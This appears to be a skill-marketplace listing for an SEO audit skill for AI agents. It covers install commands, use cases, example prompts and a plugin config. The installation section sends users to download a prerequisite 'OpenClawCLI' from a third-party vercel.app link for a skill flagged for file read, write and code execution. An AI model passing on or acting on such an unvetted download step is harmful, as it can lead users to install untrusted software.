seo-optimizer
This skill should be used when analyzing HTML/CSS websites for SEO optimization, fixing SEO issues, generating SEO reports, or implementing SEO best practices. Use when the user requests SEO audits, optimization, meta tag improvements, schema markup implementation, sitemap generation, or general search engine optimization tasks.
Why use this skill?
Analyze your HTML/CSS websites for SEO issues, fix meta tags, implement schema markup, and improve search engine rankings with the OpenClaw SEO Optimizer skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizervooWhat This Skill Does
The seo-optimizer skill is a specialized tool designed for web developers and content creators who need to audit and enhance HTML/CSS websites for better search engine visibility. It leverages the OpenClawCLI to scan project directories or individual files, providing an in-depth breakdown of critical SEO elements. The tool automatically detects missing meta tags, improper heading hierarchies, missing alt text, and absent schema markup. By transforming technical site data into actionable insights, it ensures that your web presence meets modern SEO standards.
Installation
Before using this skill, you must ensure that OpenClawCLI is installed on your system (Windows or MacOS). You can download the latest version from: https://openclawcli.vercel.app/. Once the CLI environment is ready, install the skill by running the command: clawhub install openclaw/skills/skills/thiagoruss0/seo-optimizer. Ensure you have the necessary write permissions for the project directories you intend to audit.
Use Cases
- Comprehensive Audits: Use this skill when launching a new site or auditing an existing codebase to ensure all pages are indexable and properly structured for crawlers.
- Metadata Cleanup: Automatically identify pages that lack meta descriptions or unique title tags, which are vital for click-through rates.
- Accessibility and SEO Pairing: Improve image accessibility and SEO rankings by identifying missing
altattributes across your image assets. - Structured Data Implementation: Easily verify and inject Schema.org markup to help search engines understand your site content better.
Example Prompts
- "Analyze my landing page in the current directory and generate a report of all critical SEO issues."
- "I need to improve my site's search engine visibility; scan the ./dist folder and provide a JSON report of missing meta tags and heading hierarchy issues."
- "Please generate a list of fixes for my website's images that are missing alt attributes to improve my search ranking."
Tips & Limitations
To get the best results, always run the analyzer against the root directory of your site. While this skill excels at identifying technical issues, it does not replace human oversight regarding content strategy or keyword research. Remember that --json output is best suited for programmatic integration into CI/CD pipelines, whereas the default human-readable output is ideal for manual review and developer debugging. Always verify the hierarchy of your H1-H6 tags manually after making large-scale changes, as automated tools may interpret complex design layouts differently.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-seo-optimizervoo": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: file-read, file-write, code-execution
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).